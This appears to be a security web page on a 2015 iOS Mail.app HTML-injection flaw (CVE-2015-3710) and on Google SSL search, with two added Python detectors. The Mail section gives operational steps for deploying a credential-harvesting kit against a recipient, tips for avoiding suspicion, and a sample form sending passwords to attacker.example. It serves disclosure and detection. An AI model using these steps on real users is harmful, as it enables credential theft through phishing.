Security

Security is the degree of resistance to, or protection from, harm. It applies to any vulnerable and valuable asset, such as a person, dwelling, community, nation, or organization.

iOS Mail app

iOS’s Mail app


Demonstration of a proof-of-concept attack on iOS’s Mail app. Apple was notified about the technical details of this vulnerability on 2015-01-15.


The source of this iOS Mail app exploit was posted here: https://github.com/jansoucek/iOS-Mail.app-inject-kit


iOS 8.3 Mail.app inject kit

Back in January 2015 I stumbled upon a bug in iOS’s mail client, resulting in an HTML tag in e-mail messages not being ignored. This bug allows remote HTML content to be loaded, replacing the content of the original e-mail message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password “collector” using simple HTML and CSS.

It was filed under Radar #19479280 back in January, but the fix was not delivered in any of the iOS updates following 8.1.2. Therefore I decided to publish the proof of concept code here.

Update 2015-06-30:

The exploit got a nice CVE-2015-3710 sticker and was fixed by Apple in iOS 8.4 and OS X 10.10.4. Kudos to Apple for prompt response once it was published publicly.

Usage

  • Edit the e-mail address you would like to use for password collection in framework.php
  • Upload index.php, framework.php and mydata.txt to your server
  • Send an e-mail containing HTML code from e-mail.html to the research subject
  • Don’t forget to change the modal-username GET parameter value to the e-mail address of the recipient
  • You can use https://putsmail.com for testing purposes

Credits

Framework7: Vladimir Kharlampidi (http://www.idangero.us/framework7/) – Framework7’s CSS code was used for the login dialog styling

License

MIT

Notes

The code detects that the research subject has already visited the page in the past (using cookies) and it stops displaying the password prompt to reduce suspicion.

The e-mail address and password are submitted via GET to framework.php, which then saves them to the mydata.txt file, sends them out via e-mail to the specified “collector” e-mail address and then returns the research subject back to Mail.app using a redirect to message://dummy.

The password field has autofocus enabled. We then use focus detection to hide the login dialog once the password field loses its focus (e.g. after the subject clicks on OK and submits the password). Why even bother with this redirect nonsense when you can put <form> directly inside the HTML e-mail?
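The notes above describe the shape of the prompt: a password field with autofocus, credentials submitted via GET, and a redirect back into Mail.app through message://dummy. As an added example (not the inject kit’s own code), here is a small Python scanner that flags exactly those indicators in an HTML body, whether an e-mail inspected at a gateway or the remote content it pulls in; the two sample bodies and the attacker.example host are constructed.

```python
from html.parser import HTMLParser


class CredentialPromptScanner(HTMLParser):
    """Records indicators of an embedded credential prompt in one HTML body."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases names; value-less attributes (autofocus) arrive as None
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append("password input field")
            if "autofocus" in a:
                self.findings.append("password field autofocuses")
        # HTML forms default to GET, which puts submitted credentials into URLs and logs
        if tag == "form" and a.get("method", "get").lower() == "get":
            self.findings.append("form submits via GET")
        for attr in ("href", "src", "action", "content"):
            if a.get(attr, "").strip().lower().startswith("message:"):
                self.findings.append(f"<{tag} {attr}> uses the message: scheme")


def scan_html(body):
    """Return the indicators found in one HTML body (e-mail or fetched page)."""
    scanner = CredentialPromptScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings


# Constructed samples: a benign newsletter and a prompt shaped like the one in the notes.
BENIGN = ('<html><body><p>Monthly update</p>'
          '<a href="https://example.com/news">Read more</a></body></html>')
SUSPICIOUS = ('<html><body><form method="get" action="https://attacker.example/framework.php">'
              '<input name="modal-username" value="victim@example.com">'
              '<input type="password" name="password" autofocus>'
              '<button>OK</button></form>'
              '<a href="message://dummy">Return to Mail</a></body></html>')

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, scan_html(body))
```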


Google SSL

Google SSL Search

With Google search over SSL, you can have an end-to-end encrypted search solution between your computer and Google. This secured channel helps protect your search terms and your search results pages from being intercepted by a third party. This provides you with a more secure and private search experience.

To use search over SSL, visit https://www.google.com each time you perform a search. Note that only Google web search is available over SSL, so other search products like Google Images and Google Maps are not currently available over SSL. When you’re searching over SSL, these properties may not appear in the left panel.

What is SSL?

SSL (Secure Sockets Layer) is a protocol that helps provide secure Internet communications for services like web browsing, e-mail, instant messaging, and other data transfers. When you search over SSL, your search queries and search traffic are encrypted so they can’t be read by any intermediary party such as employers and internet service providers (ISPs).

What can I expect from search over SSL?

Here’s how searching over SSL is different from regular Google search:

  • SSL encrypts the communication channel between Google and a searcher’s computer. When search traffic is encrypted, it can’t be read by third parties trying to access the connection between a searcher’s computer and Google’s servers. Note that the SSL protocol does have some limitations; more details are below.
  • As another layer of privacy, SSL search turns off a browser’s referrers. Web browsers typically turn off referrers when going from HTTPS to HTTP mode to provide extra privacy. By clicking on a search result that takes you to an HTTP site, you could disable any customizations that the website provides based on the referrer information.
  • At this time, search over SSL is supported only on Google web search. We will continue to work to support other products like Images and Maps. All features that are not supported have been removed from the left panel and the row of links at the top. You’ll continue to see integrated results like images and maps, and clicking those results will take you out of encrypted search mode.
  • Your Google experience using SSL search might be slightly slower than you’re used to because your computer needs to first establish a secure connection with Google.

Note that SSL search does not reduce the data that Google receives and logs when you search, or change the listing of these terms in your Web History.

Does SSL provide complete security?

While SSL helps prevent intermediary parties, such as ISPs, from knowing the exact search that you typed, they could still know which websites you visit once you click on the search results. For example, when you search over SSL for [ flowers ], Google encrypts the query “flowers” and the results that Google returns. But when you click on a search result, including results like images and maps, you could be exiting the encrypted mode if the destination link is not on https://.

If your computer is infected with malware or a keylogger, a third party might still be able to see the queries that you typed. We recommend that everyone learns how to prevent and remove malware. Remember that only Google web search supports search over SSL, so searching Google Images, for example, will not be encrypted.

Technical discussion of SSL protocol-level limitations

While SSL is a clear privacy and security benefit, we are aware of some technical limitations to SSL at the protocol level that are not specific to Google’s implementation:

  • A determined, skilled malicious party could potentially interpose himself into the network traffic and present a spoofed certificate to the user. In many cases, this will result in a certificate warning to the user. If you see a certificate warning, the protection may not hold.
  • An adversary with the ability to install root certificates on the machine could potentially interpose himself into the network traffic without any warnings appearing.
  • A highly capable source may be in a position to sign certificates with a standard, pre-installed certificate authority (CA), which again would allow intercept without any apparent warnings to the user.
  • Even if all web searching occurs over SSL, a passive traffic listener may still be able to observe DNS look-ups.

How can I confirm whether I’m on a secure connection?

Check to see that the URL you’re on starts with https:// instead of http://. Most browsers provide a visual confirmation (such as an icon of a lock) in the address bar or in the status bar at the bottom of the page. On Google SSL search, you’ll also see a special Google SSL logo with a lock icon. In addition to this logo, be sure to also check the https:// text in the address bar and any browser lock icons.

When you perform a search on https://www.google.com, you might see a warning if a page has some non-secure components: depending on your browser settings, you might see the lock icon turn into a warning sign, a pop-up message, or some other form of alert. This issue is often referred to as a “mixed mode error.”

Since this is a beta feature, there might be some rare cases in search over SSL that generate a mixed mode error. We’re working to prevent such errors, and you can help if you report any errors through our Help Forum.
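To make the “mixed mode” warning concrete, here is an added example (not Google’s code) that does offline what a browser does at load time: it resolves every subresource reference of an https page and reports the ones that would be fetched over plain http, separating active content (scripts, frames, stylesheets) from passive content (images, media). The sample page and the static.example and img.example hosts are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Tags/attributes that make the browser fetch a subresource while the page is displayed.
SUBRESOURCE_ATTRS = {
    "script": "src", "iframe": "src", "object": "data", "embed": "src", "link": "href",
    "img": "src", "audio": "src", "video": "src", "source": "src",
}
# Active content can run code or restyle the page; passive content is display-only.
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "link"}

class MixedContentFinder(HTMLParser):
    """Collects (kind, tag, url) for every plain-http subresource of an https page."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attr = SUBRESOURCE_ATTRS.get(tag)
        a = {k: (v or "") for k, v in attrs}
        if attr is None or attr not in a:
            return
        # Resolve relative and protocol-relative references against the page URL,
        # so a "//host/x.js" reference on an https page correctly stays https.
        target = urljoin(self.page_url, a[attr].strip())
        if urlsplit(target).scheme == "http":
            kind = "active" if tag in ACTIVE_TAGS else "passive"
            self.findings.append((kind, tag, target))

def find_mixed_content(page_url, html):
    """Return mixed-content findings for a page; a plain-http page cannot have any."""
    if urlsplit(page_url).scheme != "https":
        return []
    finder = MixedContentFinder(page_url)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample: one insecure stylesheet, one insecure image, two safe references.
PAGE_URL = "https://www.google.com/search?q=flowers"
SAMPLE = ('<html><head><link rel="stylesheet" href="http://static.example/style.css">'
          '<script src="//static.example/app.js"></script></head>'
          '<body><img src="http://img.example/lock.png"><img src="/images/logo.png">'
          '<a href="http://example.com/flowers">Flowers</a></body></html>')

if __name__ == "__main__":
    for kind, tag, url in find_mixed_content(PAGE_URL, SAMPLE):
        print(f"{kind:7} <{tag}> {url}")
```

Plain links (`<a href>`) are deliberately not reported: following one leaves the page, which is the separate case the text above describes.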

Rbcafe © 2004-